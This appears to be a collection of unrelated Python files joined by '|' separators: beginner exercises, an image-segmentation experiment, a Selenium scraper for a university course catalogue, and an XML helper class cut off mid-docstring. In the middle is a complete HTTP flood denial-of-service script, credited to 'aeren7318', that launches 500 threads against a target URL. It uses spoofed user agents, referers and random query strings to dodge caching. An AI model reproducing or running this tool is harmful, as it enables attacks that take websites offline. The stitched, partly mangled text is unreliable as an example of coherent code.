    pull_request_id = Column(String)
    label_id = Column(String)
|
# Sum the sample values and print the total (150).
# Fix: the original named its variables `list` and `sum`, shadowing both
# builtins; renamed and switched to the builtin sum().
numbers = [10, 20, 30, 40, 50]
total = sum(numbers)
print(total)
|
l = ["Bob", "Rolf", "Anne"]
t = ("Bob", "Rolf", "Anne")
# Can't modify a tuple
s = {"Bob", "Rolf", "Anne"}
# Can't have duplicate elements
# Order is not guaranteed
l.append("Smith")
# t.append("Smith")
# Tuples cannot be modified
s.add("Smith")
s.add("Bob")
# Only 1 bob will be printed, curiously, first bob was deleted
print(l)
print(t)
print(s)
|
import numpy as np
import os
import cv2
import scipy.io as sio
import sklearn.metrics.pairwise as pw
from scipy.spatial import distance_matrix
import matplotlib.pyplot as plt
from Cluster import Kmeans, NormCut
def displayImageGT (f):
    """Show image *f* alongside each of its ground-truth boundary maps,
    waiting for a key press between views.

    NOTE(review): relies on the module-level `img_dir` and a matching
    BSDS-style .mat file under ./groundTruth/test/ — confirm the dataset
    layout before reuse.
    """
    path = img_dir + f # get full path of file
    img = cv2.imread(path, -1) # read image in path
    cv2.imshow('image', img) # show groundTruth as an image
    cv2.waitKey(0) # wait for a key press
    img = cv2.resize(img, (0, 0), None, .5, .5)
    # show ground truths of image
    filename = f.split('.')[0] # getting filename without
    gt_file = './groundTruth/test/' + filename + '.mat'
    mat = sio.loadmat(gt_file) # load mat file
    gt_size = mat['groundTruth'].size
    print gt_size
    for i in range(0, gt_size):
        gt = mat['groundTruth'][0, i] # fetch groundTruth
        bound = gt['Boundaries'][0][0] # fetch boundaries in each groundTruth
        seg = gt['Segmentation'][0][0]
        plt.imshow(seg)
        plt.show()
        print bound
        bound = 255 - bound * 255 # convert numbers from (0, 1) to (0, 255)
        bound_bgr = cv2.cvtColor(bound, cv2.COLOR_GRAY2BGR) #convert image into 3-channel (BGR)
        bound_bgr = cv2.resize(bound_bgr, (0, 0), None, .5, .5) #resize the image into half of its size
        img = np.concatenate((img, bound_bgr), axis=1) #concatenate the image and its ground truth
        cv2.imshow('image', img) # show groundTruth as an image
        cv2.waitKey(0) # wait for a key press
#=======================================================================================================================
def KNN(D, k):
    """Build a k-nearest-neighbour adjacency matrix for the rows of D.

    A[i, j] = 1 iff j is one of the k nearest rows to i (by Euclidean
    distance), excluding i itself.  Note the result is generally NOT
    symmetric — neighbourhood is directed.

    Improvement over the original: the Python-level double loop is replaced
    with a single vectorized fancy-index assignment.

    :param D: (n, d) array of points.
    :param k: number of neighbours per point (k < n).
    :return: (n, n) float adjacency matrix of 0s and 1s.
    """
    n = D.shape[0]
    dist = distance_matrix(D, D)
    # Column 0 of the argsort is each point itself (distance 0); skip it.
    nearest = np.argsort(dist, axis=1)[:, 1:k + 1]
    A = np.zeros((n, n))
    A[np.arange(n)[:, None], nearest] = 1
    return A
#=======================================================================================================================
#display all pictures in folder test
# Driver: for every image in img_dir, run Normalized-Cut segmentation with
# three similarity matrices (RBF gamma=1, RBF gamma=10, 5-NN graph) for each
# K in [3,5,7,9,11], saving every label map as a .npy file.  The K-means
# branch is retained but commented out.
img_dir = './images1/test/' # path of folder test
kmeans_dir = './images1/K-means Segmentation/'
nc_dir1 = './images1/NormCut Segmentation/RBF1/'
nc_dir2 = './images1/NormCut Segmentation/RBF2/'
nc_dir3 = './images1/NormCut Segmentation/KNN/'
num = 0
for root, dirs, filenames in os.walk(img_dir): # get all filenames in dir
    for f in filenames: # display each picture and its ground truth
        if f != 'Thumbs.db':
            #show original image
            #displayImageGT(f)
            num += 1
            filename = f.split('.')[0]
            path = img_dir + f # get full path of file
            img = cv2.imread(path, -1) # read image in path
            print '\n\nImage #' + str(num) + ' has been read'
            data1 = img.reshape(img.shape[0] * img.shape[1], 3)
            print data1.shape
            print 'Resizing Image'
            # NormCut runs on a quarter-size image to keep the (pixels x
            # pixels) affinity matrix tractable.
            img2 = cv2.resize(img, (0, 0), None, .25, .25)
            data2 = img2.reshape(img2.shape[0] * img2.shape[1], 3)
            print data2.shape
            print 'Starting Clustering Algorithm\n'
            K = [3, 5, 7, 9, 11]
            for k in K:
                print '\nK = ' + str(k)
                kmeans_path = kmeans_dir + str(k) + '/' + filename
                nc_path1 = nc_dir1 + str(k) + '/' + filename
                nc_path2 = nc_dir2 + str(k) + '/' + filename
                nc_path3 = nc_dir3 + str(k) + '/' + filename
                #print '\nStarting K-means Algorithm'
                #[C, segmentation] = Kmeans(data1, k)
                #out = np.matrix(segmentation).reshape(img.shape[0], img.shape[1])
                #np.save(kmeans_path, out)
                #print 'K-means Clustering has finished. The clusters are:'
                #for j in range(0, k):
                # print 'Cluster #' + str(j)
                # print len(C[j])
                #==========================================================================
                print '\nCreating Similarity Matrix (RBF gamma = 1)'
                A = pw.rbf_kernel(data2, gamma=1)
                print 'Starting Normalized Cut Algorithm'
                [C, segmentation] = NormCut(A, k)
                out = np.matrix(segmentation).reshape(img2.shape[0], img2.shape[1])
                np.save(nc_path1 , out)
                print 'Normalized Cut (RBF gamma = 1) has finished. The clusters are:'
                for j in range(0, k):
                    print 'Cluster #' + str(j)
                    print len(C[j])
                #============================================================================
                print '\nCreating Similarity Matrix (RBF gamma = 10)'
                A = pw.rbf_kernel(data2, gamma=10)
                print 'Starting Normalized Cut Algorithm'
                [C, segmentation] = NormCut(A, k)
                out = np.matrix(segmentation).reshape(img2.shape[0], img2.shape[1])
                np.save(nc_path2, out)
                print 'Normalized Cut (RBF gamma = 10) has finished. The clusters are:'
                for j in range(0, k):
                    print 'Cluster #' + str(j)
                    print len(C[j])
                #=============================================================================
                print '\nCreating Similarity Matrix (5-NN)'
                A = KNN(data2, 5)
                print 'Starting Normalized Cut Algorithm'
                [C, segmentation] = NormCut(A, k)
                out = np.matrix(segmentation).reshape(img2.shape[0], img2.shape[1])
                np.save(nc_path3, out)
                print 'Normalized Cut (5-NN) has finished. The clusters are:'
                for j in range(0, k):
                    print 'Cluster #' + str(j)
                    print len(C[j])
|
# -*- coding: utf-8 -*-
print '---------------------------------------------------'
print 'bu script aeren7318 tarafından yapıldı calanların amk'
print 'hiçbir sorumluluk bana ait degil'
print '---------------------------------------------------'
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Bloglines/3.1 (http://www.bloglines.com)')
headers_useragents.append('CSSCheck/1.2.2')
headers_useragents.append('Dillo/2.0')
headers_useragents.append('DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)')
headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)')
headers_useragents.append('Download Demon/3.5.0.11')
headers_useragents.append('ELinks/0.12~pre5-4')
headers_useragents.append('ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)')
headers_useragents.append('ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)')
headers_useragents.append('EmailWolf 1.00')
headers_useragents.append('everyfeed-spider/2.0 (http://www.everyfeed.com)')
headers_useragents.append('facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)')
headers_useragents.append('FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)')
headers_useragents.append('FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)')
headers_useragents.append('Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a')
headers_useragents.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2')
headers_useragents.append('Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0')
headers_useragents.append('Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34')
headers_useragents.append('Links/0.9.1 (Linux 2.4.24; i386;)')
headers_useragents.append('Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)')
headers_useragents.append('Links (2.1pre15; Linux 2.4.26 i686; 158x61)')
headers_useragents.append('Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)')
headers_useragents.append('Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12')
headers_useragents.append('Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d')
headers_useragents.append('Mediapartners-Google')
headers_useragents.append('Microsoft URL Control - 6.00.8862')
headers_useragents.append('Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2)')
headers_useragents.append('MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0')
headers_useragents.append('MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0')
headers_useragents.append('MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0')
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0')
headers_useragents.append('SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0')
headers_useragents.append('SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonT100/R101')
headers_useragents.append('SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0')
headers_useragents.append('SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0')
headers_useragents.append('SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Wget/1.9.1)')
headers_useragents.append('wii libnup/1.0')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US)')
headers_useragents.append('SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0')
headers_useragents.append('SuperBot/4.4.0.60 (Windows XP)')
headers_useragents.append('Uzbl (Webkit 1.3) (Linux i686 [i686])')
headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1')
headers_useragents.append('W3C_Validator/1.654')
headers_useragents.append('w3m/0.5.1')
headers_useragents.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
headers_useragents.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
headers_useragents.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
headers_useragents.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
headers_useragents.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
headers_useragents.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
headers_useragents.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
headers_useragents.append('WDG_Validator/1.6.2')
headers_useragents.append('WebCopier v4.6)')
headers_useragents.append('Web Downloader/6.9)')
headers_useragents.append('WebZIP/3.5 (http://www.spidersoft.com')
headers_useragents.append('Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30')
headers_useragents.append('Opera/7.50 (Windows ME; U) [en]')
headers_useragents.append('Opera/7.50 (Windows XP; U)')
headers_useragents.append('Opera/7.51 (Windows NT 5.1; U) [en]')
headers_useragents.append('Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr')
headers_useragents.append('Opera/9.0 (Macintosh; PPC Mac OS X; U; en)')
headers_useragents.append('Opera/9.20 (Macintosh; Intel Mac OS X; U; en)')
headers_useragents.append('Opera/9.25 (Windows NT 6.0; U; en)')
headers_useragents.append('Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)')
headers_useragents.append('Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)')
headers_useragents.append('Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0')
headers_useragents.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0')
headers_useragents.append('Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1')
headers_useragents.append('Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0')
headers_useragents.append('Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00')
headers_useragents.append('Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52')
headers_useragents.append('Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61')
headers_useragents.append('Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00')
headers_useragents.append('Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00')
headers_useragents.append('Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10')
headers_useragents.append('Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01')
headers_useragents.append('Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00')
headers_useragents.append('Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10')
headers_useragents.append('Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00')
headers_useragents.append('msnbot/0.11 ( http://search.msn.com/msnbot.htm)')
headers_useragents.append('msnbot/1.0 ( http://search.msn.com/msnbot.htm)')
headers_useragents.append('msnbot/1.1 ( http://search.msn.com/msnbot.htm)')
headers_useragents.append('NetSurf/1.2 (NetBSD; amd64)')
headers_useragents.append('Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0')
headers_useragents.append('Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0')
headers_useragents.append('Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0')
headers_useragents.append('NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0')
headers_useragents.append('NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'BU SCRIPT AEREN7318 TARAFINDAN GELISTIRILMISTIR.'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'site Allahına kavusuyor'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "\n-- aeren7318 Attack Finished --"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- aeren7318 Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('(https?\://)?([^/]*)/?.*', url)
# host = m.group(2)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
import time

# Scrapes the Rutgers Schedule of Classes: for every department, every
# course, and every section, writes each weekly meeting's day/hours/campus/
# building to fall2019.txt.  Element lists are re-fetched after each click
# because the page re-renders and stale references would otherwise break.

#change my name to your username
driver_path = "/Users/giannaaprile/RUClassroom/chromedriver"
browser = webdriver.Chrome(driver_path)
f = open("fall2019.txt", "w+")

def moveInView(x):
    # Scroll the element into the viewport so Selenium can click it.
    browser.execute_script("arguments[0].scrollIntoView(true);",x)

# NOTE(review): URL says semester=12019 (Spring 2019) while the output file
# is named fall2019.txt -- confirm which term is intended.
browser.get("https://sis.rutgers.edu/soc/#subjects?semester=12019&campus=NB&level=U")
browser.implicitly_wait(5)
dropButton = browser.find_element_by_xpath("""//*[@id="widget_dijit_form_FilteringSelect_0"]/div[1]/input""")
dropButton.click()
dropMenu = browser.find_element_by_xpath("""//*[@id="dijit_form_FilteringSelect_0_popup"]""")
departments = [x for x in dropMenu.find_elements_by_css_selector(".dijitReset.dijitMenuItem")]
# Iterate through each department
count = 0
while count < len(departments):
    time.sleep(1)
    # Re-fetch: the menu items go stale after the page updates.
    departments = [x for x in dropMenu.find_elements_by_css_selector(".dijitReset.dijitMenuItem")]
    moveInView(departments[count])
    departments[count].click()
    time.sleep(5)
    courseList = [x for x in browser.find_elements_by_css_selector(".courseExpandIcon")]
    # Iterate through each class in the department
    classCount = 0
    while classCount < len(courseList):
        # This can be shortened depending on wifi strength
        time.sleep(1)
        courseList = [x for x in browser.find_elements_by_css_selector(".courseExpandIcon")]
        moveInView(courseList[classCount])
        # Expand the course row to reveal its sections.
        courseList[classCount].find_element(By.TAG_NAME, 'img').click()
        # Gets each sections information
        courseData = [x for x in browser.find_elements_by_css_selector(".courseData")]
        sectionInfoList = [x for x in courseData[classCount].find_elements_by_css_selector(".sectionData")]
        # Go through each section
        sectionCount = 0
        while sectionCount < len(sectionInfoList):
            time.sleep(1)
            courseData = [x for x in browser.find_elements_by_css_selector(".courseData")]
            sectionInfoList = [x for x in courseData[classCount].find_elements_by_css_selector(".sectionData")]
            moveInView(sectionInfoList[sectionCount])
            classesPerWeek = len([x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeDay")])
            # Print hours for class
            meetingCount = 0
            while meetingCount < classesPerWeek:
                courseData = [x for x in browser.find_elements_by_css_selector(".courseData")]
                sectionInfoList = [x for x in courseData[classCount].find_elements_by_css_selector(".sectionData")]
                dayList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeDay")]
                hourList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeHours")]
                campusList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeCampus")]
                buildingList = [x for x in sectionInfoList[sectionCount].find_elements_by_css_selector(".meetingTimeBuildingAndRoom")]
                print(dayList[meetingCount].text, hourList[meetingCount].text, campusList[meetingCount].text, buildingList[meetingCount].text)
                newEntry = dayList[meetingCount].text + ' ' + hourList[meetingCount].text + ' ' + campusList[meetingCount].text + ' ' + buildingList[meetingCount].text + "\n"
                f.write(newEntry)
                meetingCount = meetingCount+1
            sectionCount = sectionCount+1
        # Close drop down to prevent loop
        moveInView(courseList[classCount])
        courseList[classCount].find_element(By.TAG_NAME, 'img').click()
        classCount = classCount+1
    dropButton.click()
    count = count + 1
|
from sys import argv

# Python 2 exercise script: demonstrates read(), seek() and readline()
# on a file whose path is given as the first command-line argument.
script, input_file = argv

def print_all(f):
    # Dump everything from the current file position to EOF.
    print f.read()

def rewind(f):
    # moves to new file position in bytes (i.e. 0th byte)
    # there is a second optional argument which dictates the mode of
    # offset (the first argument). Default is offset from beginning of file
    # but if second argument is 1: offset is relative to current position,
    # and if second arg is 2: offset is relative to end of file
    f.seek(0)

def print_a_line(line_count, f):
    # Print the given line number followed by the next line of the file.
    print line_count, f.readline(), # extra comma avoids adding a \n

current_file = open(input_file)

print "First let's print the whole file:\n"
print_all(current_file)

print "Now let's rewind, kind of like a tape."
rewind(current_file)

print "Let's print three lines:"
current_line = 1
print_a_line(current_line, current_file)

current_line = current_line + 1
print_a_line(current_line, current_file,)

current_line += 1
print_a_line(current_line, current_file)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/30 14:47
# @Author : Jason
# @Site :
# @File : xmlparse.py
# @Software: PyCharm
import xml.etree.ElementTree as ET
import sys
import os.path
class XmlParse:
    """Thin wrapper around xml.etree.ElementTree for reading, editing and
    writing a single XML document."""

    def __init__(self, file_path):
        # Parsed tree and its root element; populated by ReadXml().
        self.tree = None
        self.root = None
        self.xml_file_path = file_path

    def ReadXml(self):
        """Parse the configured XML file.

        Returns the parsed ElementTree on success.  On failure it prints a
        message and calls sys.exit(); NOTE: the ``return`` in ``finally``
        swallows that SystemExit, so in practice a failed parse returns
        None (behavior preserved from the original).
        """
        try:
            print("xmlfile:", self.xml_file_path)
            self.tree = ET.parse(self.xml_file_path)
            self.root = self.tree.getroot()
        except Exception as e:
            print("parse xml failed!")  # typo fixed: was "faild"
            sys.exit()
        else:
            print("parse xml success!")
        finally:
            return self.tree

    def CreateNode(self, tag, attrib, text):
        """Create and return a detached Element with the given tag,
        attribute dict and text."""
        element = ET.Element(tag, attrib)
        element.text = text
        print("tag:%s;attrib:%s;text:%s" % (tag, attrib, text))
        return element

    def AddNode(self, Parent, tag, attrib, text):
        """Create a new element and append it to *Parent*.

        Bug fix: the original tested ``if Parent:``, but an Element with no
        children is falsy, so appending to an empty parent silently did
